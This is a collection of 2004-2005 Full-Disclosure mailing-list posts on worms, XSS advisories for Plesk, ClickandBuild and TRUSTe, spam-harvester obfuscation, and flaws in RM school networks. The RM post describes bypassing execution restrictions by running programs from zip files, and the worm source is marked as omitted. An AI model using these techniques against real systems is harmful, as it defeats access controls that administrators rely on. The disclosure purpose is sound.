Re: [Full-Disclosure] Re: Followup to T-Mobile hack
More info on the hacking: http://www.parishiltonsmobile.com/

On Tue, 22 Feb 2005 09:40:58 +0100 (CET), Feher Tamas [EMAIL PROTECTED] wrote:
> One top star reached Sunday morning expressed total outrage at Paris.
>
> Is Dubya a star...? (Maybe a shooting star. Won't last long.)

--
zxy_rbt2

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] How T-Mobil's network was compromised
Wait until he's out (or earlier), a book will no doubt be written :-)
Re: [Full-Disclosure] hushmail.com, is this true?
To me this suggests that, unlike most web-based e-mail providers such as Hotmail, Hushmail does not send the user's IP address in the headers of the e-mail, but Hushmail still logs IP addresses.
[Full-Disclosure] PHP Worms
I thought these had stopped? I'm still seeing thousands of them each day:

[three URL-encoded GET requests to read100.php omitted; seen 20, 3 and 1500 times]

(just from today) They seem to be getting promptly deleted from the host server (I'm yet to find a live one) but I was under the impression that the initial burst was over?

--
zxy_rbt2
Re: Re[2]: [Full-Disclosure] Amazon.com is down
Looks like an attempt to initiate a DDoS on Amazon from FD readers going to check if it's up or down :)) but you'd have to be a complete moron to think that that would work.. And if it truly was a joke (I hope to God not) then I do not believe it is us that are Humour Impaired..

--
zxy_rbt2
Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions
I hate to say this.. but it's actually quite good. Picked up spyware I'd been forced to manually disable (because Ad-Aware + Spybot S&D didn't see it) and gave me an *option* to remove Kazaa et al (as, whilst they contain spyware, I may want to keep them).
Re: [Full-Disclosure] Santy Variant attacking about 50 PHP-applications
Also the spy.gif script:

[PHP web-shell source and the Perl ShellBOT header that followed it omitted]
Re: [Full-Disclosure] Santy Variant attacking about 50 PHP-applications
Covered on the F-Secure weblog, the DNS has been pointed at 127.0.0.2 so no more bots will be connecting. Just posting the source in case 5wk.com dies:

[Perl worm source and its list of target URLs omitted]
Re: [Full-Disclosure] Just a thought (from an autoreply to another thread)
Indeed, but as mentioned in another FD post (something along the lines of "don't mind me, just getting the xmas auto replies") how many do we know aren't honey pots? Or being closely monitored? It could all be an elaborate scheme..

On Fri, 31 Dec 2004 23:14:43 -0500, Byron L. Sonne [EMAIL PROTECTED] wrote:
> You know, people that set these auto-replies often give out a good amount of information (of the social engineering kind and otherwise), if someone were to apply themselves...
>
> Schwarzwaelder, Joerg wrote:
>> I will not be in the office at least until January 9th, 2005. Please send
>> - ssh, watchdog and hvu relocation issues to Alexander Bossert
>> - firewall issues to [EMAIL PROTECTED]

--
zxy_rbt2
Re: [Full-Disclosure] YET AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2
> About switching to FireFox: if you drive a car you might end up in a car-crash, changing cars doesn't prevent that. If 90% of people would be driving the exact same car, it's obvious most car-crashes will involve that car.

Worst internet/real life analogy ever.

--
zxy_rbt2
[Full-Disclosure] Plesk 7 Cross-Site Scripting
Vendor: SW-Soft
URL: http://www.sw-soft.com/
Version: Plesk 7.0.0
Risk: Cross-Site Scripting

Description:
Plesk is comprehensive server management software developed specifically for the Hosting Service Industry with the assistance of Web hosting professionals. Time tested tough in real world hosting environments this award winning control panel software has proven itself for years to be simply the best.

Cross Site Scripting:
There's a cross-site scripting vulnerability in the login page for Plesk 7, another case of improperly secured POST data. An attacker can inject data into the page through the login_name variable on the login page (login_up.php3). An example can be found here:
http://www.wheresthebeef.co.uk/XSS/plesk.7.html
The CSS isn't done through a GET request, it is done through POST and can be exploited in the form of a form.

Solution:
The vendor hasn't replied to any of my e-mails but they do appear to have fixed this problem. *Hello SW-Soft, if you're watching!*

--
zxy_rbt2
[Full-Disclosure] Contact BankOne.com ?
Hi,

Has anyone got any idea how I can contact BankOne.com, or anyone that can for me? I don't have an account with them, which apparently means my e-mails to them aren't SECURE.

Thanks,
Andrew Smith.

--
zxy_rbt2
Re: [Full-Disclosure] Lycos Europe organizing a DDoS attack against spammers
A GET to http://makelovenotspam.com/intl/static/ is what the screen saver does initially.

I can not see this lasting long;
1) Whatever they say, they're breaking the law
2) They're DDoSing spammers, the people with millions of bots / gigabits of bandwidth under their control.. we can see now that the spammers have already retaliated. I haven't been able to access makelovenotspam.com for days.

On Wed, 1 Dec 2004 12:47:05 -0600, Kevin [EMAIL PROTECTED] wrote:
> On Tue, 30 Nov 2004 13:38:31 +0100 (CET), Feher Tamas [EMAIL PROTECTED] wrote:
>> Lycos Europe organizing a DDoS attack against spammers
>> Lycos Europe has started organizing a distributed denial-of-service attack against web sites run by spammers. Lycos, via its makelovenotspam.com website, is offering a free screensaver for download. The screensavers make constant http requests to spam websites.
>
> Can anybody provide pointers on how to detect this traffic by reviewing squid proxy logs? I'd guess that at least a few of our (thousands of) users will install makelovenotspam, but lacking the authority to lock down or examine desktops, I'm limited to reviewing access logs after the fact to track down offenders.
>
> Thanks,
> Kevin Kadow

--
zxy_rbt2
Re: [Full-Disclosure] this is fun?
..Or if you're fortunate enough to use Windows (?), the screen jumps around whilst the wav "HEY EVERYONE, I'M LOOKING AT GAY PORNO" loops.
Re: [Full-Disclosure] Secret Vulns: Places of confusion
Ooh! A boast thread, goody! There are many vulnerabilities in many .gov websites; I think the fact that you might get arrested and/or labelled a terrorist deters most people.

--
zxy_rbt2
Re: [Full-Disclosure] Why is IRC still around?
> Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC?

Because you can't. I'm not sure what you think IRC is.. but it isn't one network run by a few geeks. It's thousands of networks across the world, open source IRC servers and millions/billions(?) of users. You can't stop IRC because people do bad things there, this is the internet.. what do you expect?

--
zxy_rbt2
Re: [Full-Disclosure] Why is IRC still around? (Because anything less would be uncivilized)
> Well, fellow F-D'ers, thanks to the vast array of intelligence and experience found on this list, my rant about abolishing IRC has been proven to be far from a solution.

I.. can't tell if it's sarcasm or not, damn those trolls and their mind poisoning ways.

--
zxy_rbt2
Re: [Full-Disclosure] Why is IRC still around?
Danny: there's no need to keep replying, this is a mailing list. Here's what happens:

1) Question posted.
2) Valid replies posted.
3) 30-40 others repeat replies at 2)
4) In come the trolls..

--
zxy_rbt2
[Full-Disclosure] Click and Build eCommerce Platform Cross Site Scripting
ClickandBuild: http://apply.clickandbuild.com/
Online eCommerce platform.

Vulnerability:
The vulnerability lies in the listPos variable in the script running at cashncarrion.co.uk. It does not properly secure user-inputted variables, presumably as the user is not supposed to input the variable but can do so easily through the URL. I was not able to find any other unchecked variables that are printed, but there could be more.

More information and examples can be found here:
http://www.wheresthebeef.co.uk/XSS/clicknbuild.html
and here:
http://www.wheresthebeef.co.uk/XSS/cash.n.carrion.co.uk.html

The vendor has been informed and claims to have fixed this problem.

--
zxy_rbt2
Re: [Full-Disclosure] dab@heise.de
Interesting, I haven't noticed any. I guess Gmail is picking them up?

On Fri, 12 Nov 2004 12:44:44 -0300, Jeff Donahue [EMAIL PROTECTED] wrote:
> Obviously this is usual, because the list is unmoderated... Either get a good AV or keep from clicking the executable attachments. ;)
>
> ----- Original Message -----
> From: Stephen Hunt [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
> Sent: Thursday, November 11, 2004 5:35 PM
> Subject: [Full-Disclosure] [EMAIL PROTECTED]
>
>> Wow, 2nd day on this list and already a windows worm sent to it. Is this a regular occurrence?
>>
>> -Steve
[Full-Disclosure] TRUSTe.org Cross-Site-Scripting Phishing opportunities
Website: http://truste.org

Background:
TRUSTe® is an independent, nonprofit organization dedicated to enabling individuals and organizations to establish trusting relationships based on respect for personal identity and information in the evolving networked world. Through extensive consumer and Web site research and the support and guidance of many established companies and industry experts, TRUSTe has earned a reputation as the leader in promoting privacy policy disclosure, informed user consent, and consumer education. TRUSTe's members include eBay, Apple, MSN, NYTimes and many other big, scary corporations.

Description:
TRUSTe's 'ivalidate.php' is used to validate trusted sites. Whilst the script does add slashes to quotes and closes script and style tags, there are a number of HTML tags it does not strip, including link, div and iframe. This leaves the site open to attack from phishers wanting to make their site appear trusted.

Further information can be found here: http://wheresthebeef.co.uk/XSS/

TRUSTe.org were informed of the vulnerability through various e-mail addresses 5 days ago; they are yet to respond or fix the problem.
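As an added illustration (not code from the original post, and not TRUSTe's own filter), the filtering behaviour the post describes is reconstructed in JavaScript beside a whitelist-style encoder; blacklistFilter(), the sample inputs and the tag names are assumptions based only on the post's description.

```javascript
// Added example: blacklist filtering versus output encoding, modelled on the
// behaviour the post describes.  blacklistFilter() is an assumed reconstruction
// of that description, not the real ivalidate.php code.

// Blacklist style: escape quotes, strip <script>/<style> tags, pass the rest.
function blacklistFilter(input) {
  const slashed = input.replace(/(["'])/g, "\\$1");                 // "add slashes to quotes"
  return slashed.replace(/<\s*\/?\s*(script|style)[^>]*>/gi, "");  // drop script/style tags only
}

// Whitelist style: encode every HTML metacharacter, so no input can open a
// tag or break out of an attribute, whatever tag name it uses.
function encodeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, ch => map[ch]);
}

// Does the filtered output still contain an HTML start tag?
function containsTag(html) {
  return /<[a-z][^>]*>/i.test(html);
}

// Constructed sample inputs: the two tag types the blacklist handles, then the
// three tag types the post names as not stripped (link, div, iframe).
const SAMPLE_INPUTS = [
  '<script>x()</script>',
  '<style>body{display:none}</style>',
  '<link rel="stylesheet" href="http://example.com/x.css">',
  '<div style="position:absolute;top:0">seal</div>',
  '<iframe src="http://example.com/"></iframe>',
];

// Returns the sample inputs that still render as markup after the filter.
function leaks(filter) {
  return SAMPLE_INPUTS.filter(s => containsTag(filter(s)));
}

console.log("blacklist leaks:", leaks(blacklistFilter));  // link, div, iframe
console.log("encoder leaks:", leaks(encodeHtml));         // none
```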
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68
> Today I got e-mail from 69.197.83.68 CANADA ISP which has undetectable virus.

This just means that you or your A/V hasn't updated their virus definitions. Try multiple A/V programs, this will cover a wider range of 'viruses'.

> Well I downloaded this file but I didn't run it because I know it is virus.

Good call.

> and now I am complaining to rogers.com ISP about this matter.

Bad call. Chances are this wasn't intentionally sent to you; the person who did execute the virus themselves without realising and it proceeded to email itself to you and hundreds of other people. I doubt rogers.com will care or be able to do anything. Best bets would be to report this virus to A/V vendors.

There is no such thing as an undetectable virus; right now I could write a .bat file to delete key files on your system upon execution. Anti-virus products wouldn't pick it up, it's just a bat file, sent to one person. If it isn't being picked up as a virus then you may want to consider switching anti-virus software.
Re: [Full-Disclosure] why o why did NASA do this.
Am I the only one that noticed the time stamps? These are 6 years old.

On Sun, 17 Oct 2004 01:17:59 -0600, Mike Diehl (Encrypted email preferred) [EMAIL PROTECTED] wrote:
> On Thursday, October 14, 2004 3:13 PM, Deigo Dude wrote:
>> ftp://ftp.hq.nasa.gov/pub/nickname/
>> The list contains the full name, email, phone, fax, position, building, room, and employer. When will they learn.
>
> Does anyone know where I can get their Social Security Numbers? I tried Goggle with little success!
>
> Personally identifying information of government, or any, employees should not be subject to Freedom of Information. The risks, which the government isn't responsible for, are just too great for these people. If I use the FOIA to get his information, at least I had to use my RealName (tm) to get it. Posting this on the web is simply irresponsible.
>
> JMHO
Re: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??!
That's not Radmin, that's a 'dropper' to silently install Radmin.. intended almost always for use as a trojan. So of course NAV will pick it up as a virus.

On Wed, 13 Oct 2004 11:38:36 +0200 (CEST), Feher Tamas [EMAIL PROTECTED] wrote:
> Ill Will wrote:
>> oops... http://www.illmob.org/0day/ghostradmin.zip
>
> Trojandropper.Win32.RDM.a
Re: [Full-Disclosure] Quicky Analysis of a Proxy/Zombie Network
wow, interesting stuff. Never seen anything like that before :-)

On Wed, 13 Oct 2004 13:40:35 +1300, VeNoMouS [EMAIL PROTECTED] wrote:
> there u go guys
>
> ----- Original Message -----
> From: Gregory Gilliss [EMAIL PROTECTED]
> To: Steele [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Sent: Wednesday, October 13, 2004 11:08 AM
> Subject: Re: [Full-Disclosure] Quicky Analysis of a Proxy/Zombie Network
>
>> Bravo! Excellent work!
>>
>> -- Greg
>>
>> On or about 2004.10.12 15:41:16 +, Steele ([EMAIL PROTECTED]) said:
>>> For your consideration: http://lowkeysoft.com/proxy/ screenshots included :) be gentle,
>>
>> --
>> Gregory A. Gilliss, CISSP
>> E-mail: [EMAIL PROTECTED]
>> Computer Security WWW: http://www.gilliss.com/greg/
>> PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3
Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal.
This is the internet. This isn't your home, your car, your wallet. This is the internet. Offline analogies do not work. They also make my brain hurt, please do not use them.

Whilst breaking a weak lock is criminal on the internet and in real life, it's also a hell of a lot easier to do on the internet, and a hell of a lot harder to get caught. The fact that something is illegal discourages no-one; the fact that they may get caught and punished discourages most. The amount of laws it is possible to break by clicking a few links is insane, and only ever enforced if a large corporation is involved.

I don't know what you expect from this rant, but I am quite concerned that someone with a CitiGroup (a bank?!) email address is talking about credit cards being stolen and weak locks.

On Fri, 08 Oct 2004 10:26:13 -0400, KF_lists [EMAIL PROTECTED] wrote:
> Who pissed in your Wheaties?
>
> -KF
>
> Clairmont, Jan M wrote:
>> I just don't understand people who think by using some cheap trick they get into my files or website and hack them, that they have no personal responsibility. It's insane to think and criminal that anything you can get into is fair game. Just because I have a cheap lock you can break does not make invading my home or personal property yours. Eh gods man, how does this type of idiotic logic prevail, just because I lost my wallet does not constitute your right to use my credit card, atm card and personal information for your enrichment. Because you can get into some sieve unsecured systems gives you the right to exploit or rape a person's bank account, steal their identity and generally destroy someone's life.
>>
>> I have found a number of wallets and purses and returned them intact to the rightful owners, as I have done with computer systems that my friends, neighbors and clients have used with vulnerabilities or virii. Sometimes they didn't even know I helped or fixed something. You know why because I respect the privacy and property of others. And if you don't, you deserve the indignation and the handcuffs they put on you when they drag you down to chinatown, baby.
>>
>> Compute Fair, Compute Fun, Compute secure
>> Jan Clairmont
>> Paladin of Security, Take no Prisoners!
>> Unix Security Support/Consultant
Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal.
Am I the only one concerned at the childish behaviour on these mailing lists? I've not been reading for so long, but in my second or third email to these lists I've been told that someone 'doesn't care' about me and my 'weak brain'. And now this 'OK. You're wrong.'? Is this necessary? I believe Morning_Wood raises some good points.
[Full-Disclosure] Simple but Effective Spam Harvester Solutions
Not entirely sure if this is appropriate for full-disclosure. Ah well.

As you may well know there are programs that scour the internet looking for email addresses; some people attempt to thwart them by writing emails like my_email (AT) mydomain (DOT) com. These don't really work, so I figured some of my own out. They appear to have been successful; I will share them with you now.

Using HTML escape characters is a popular method, eg:

    <a href="mailto&#58;escchar&#64;shiz&#46;biz">contact me</a>

This works quite well but is easy to defeat (more on HTML escape chars: http://www.theukwebdesigncompany.com/articles/entity-escape-characters.php).

I then started toying with JavaScript, this worked great. Here are some examples:

    <script>
    document.write('<a href="mailto:js1');
    document.write('@shiz.biz">');
    document.write('contact me</a>');
    </script>

    <script>
    var a = "@shiz.biz";
    document.write('<a href="mailto:');
    var b = "js2";
    document.write(b);
    document.write(a);
    </script>
    ">contact me</a>

    <!-- a.htm and b.htm each define one half of the address (a and b) -->
    <script language="Javascript" src="a.htm"></script>
    <script language="Javascript" src="b.htm"></script>
    <script>
    document.write('<a href="mailto:');
    document.write(a + b);
    </script>
    ">contact me</a>

Also worked pretty well. As it gets more complicated it's far harder to defeat.

Then I found PHP could be used: creating a file called 'mail.php' and entering

    <?php header("Location: mailto:[EMAIL PROTECTED]"); ?>

into it meant that linking to mail.php would launch an email.

Anyways, more info can be found here: http://www.wheresthebeef.co.uk/?p=hat

I hope some people have found this useful.
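Added example (not code from the original post): the "(AT)/(DOT)" spelling, the entity-encoding layer and the JavaScript-assembly layer described above, each fed to a deliberately naive address harvester so the reader can see what each layer does and does not hide; the address values, the harvester regex and the helper names are constructed for this demo.

```javascript
// Added example: the obfuscation layers from the post, checked against a
// naive harvester.  All addresses below are constructed for the demo.

// Naive harvester: one regex over raw page source, no entity decoding and no
// script execution.  An assumed model of the "programs that scour the
// internet" the post describes, used here only for illustration.
function naiveHarvest(source) {
  return source.match(/[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}/g) || [];
}

// The "(AT)/(DOT)" spelling: one replace and the address is plain again,
// which is why the post says this trick does not really work.
function atDotHarvest(source) {
  const plain = source.replace(/\s*\(AT\)\s*/gi, "@").replace(/\s*\(DOT\)\s*/gi, ".");
  return naiveHarvest(plain);
}

// Layer 1: HTML numeric entities, one &#NN; per character.
function entityEncode(text) {
  return Array.from(text, ch => "&#" + ch.charCodeAt(0) + ";").join("");
}

// A harvester that decodes entities before scanning defeats layer 1,
// which is the "easy to defeat" caveat in the post.
function entityDecode(html) {
  return html.replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)));
}

// Layer 2: the address is assembled by script at view time.  The page source
// holds only the pieces; even the "@" is produced by String.fromCharCode(64),
// so no regex over the raw source can find a complete address.
function mailtoScript(user, domain) {
  return [
    "<script>",
    "var a = '" + user + "';",
    "var b = '" + domain + "';",
    "document.write('<a href=\"mailto:' + a + String.fromCharCode(64) + b + '\">contact me</a>');",
    "</script>",
  ].join("\n");
}

// What the browser ends up with after running mailtoScript(): a harvester
// that executes scripts (or reads the rendered DOM) sees the full address.
function renderedMailto(user, domain) {
  return '<a href="mailto:' + user + "@" + domain + '">contact me</a>';
}

// Summary: true where the naive harvester recovers the address.
function survey(user, domain) {
  const addr = user + "@" + domain;
  return {
    plain: naiveHarvest('<a href="mailto:' + addr + '">contact me</a>').length > 0,
    atDot: atDotHarvest(user + " (AT) " + domain.replace(".", " (DOT) ")).length > 0,
    entities: naiveHarvest(entityEncode(addr)).length > 0,
    entitiesDecoded: naiveHarvest(entityDecode(entityEncode(addr))).length > 0,
    scriptSource: naiveHarvest(mailtoScript(user, domain)).length > 0,
    scriptRendered: naiveHarvest(renderedMailto(user, domain)).length > 0,
  };
}

console.log(survey("someone", "example.com"));
```

The PHP redirect from the post is the strongest of the three because the address never appears in any page source at all; it is not modelled here.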
[Full-Disclosure] Research Machines(RM) Networks / Setup
Research Machines (RM) are "The Leading Supplier of Software, Services and Systems to UK Education". Mainly seen in high schools in the UK. The following was revealed to them well over 6 months ago. I received no reply from my email.

a) Publicly Available Admin Tools
b) Publicly Writable Status Manager
c) .EXE Executions

a) The administration tools used to monitor students while they work, and that can also be used to control students' computers, modify students' files and even change passwords, are installed on every single computer and can be executed by every single user. I've found this to be true of around 200 computers (located in different rooms, installed at different times) at my school. The program can be found in its default location here:
C:\Program Files\Research Machines\RM Tutor 2\Controller\TeacherLaunch.exe

b) The 'RM Status Manager' is a script that allows you to view your remaining printer credits, remaining quota space, etc. This file is simply an html/vbscript file located on every computer's hdd. It can be accessed AND edited at its default location:
C:\RMExplorerURL\Status.htm
Obviously this has many security implications, especially if an outdated version of Internet Explorer (which is used to view this file) is installed.

c) Execution of .exe files located in the user's home directory (N:) is restricted by default. This can be defeated by using Windows XP's zipping feature: adding the .exe file to a .zip file and THEN opening the .zip file and running the .exe 'from' the .zip file. This will cause Windows to extract the .exe file to a default temporary directory, and the default temporary directory is on C:! Which means we have rights to execute it.
[Full-Disclosure] Short Paper on the warez scene
Hi,

I wrote a short paper/article on the warez scene for 2600 magazine (www.2600.com). It contains some valuable information about who is hacking you and why; thought this may interest some of you (especially the many I've seen on here who have found an unknown FTP server on their computer).

A scan from 2600 magazine is available here: http://www.wheresthebeef.co.uk/2600_Guide_to_Internet_Piracy-TYDJ.zip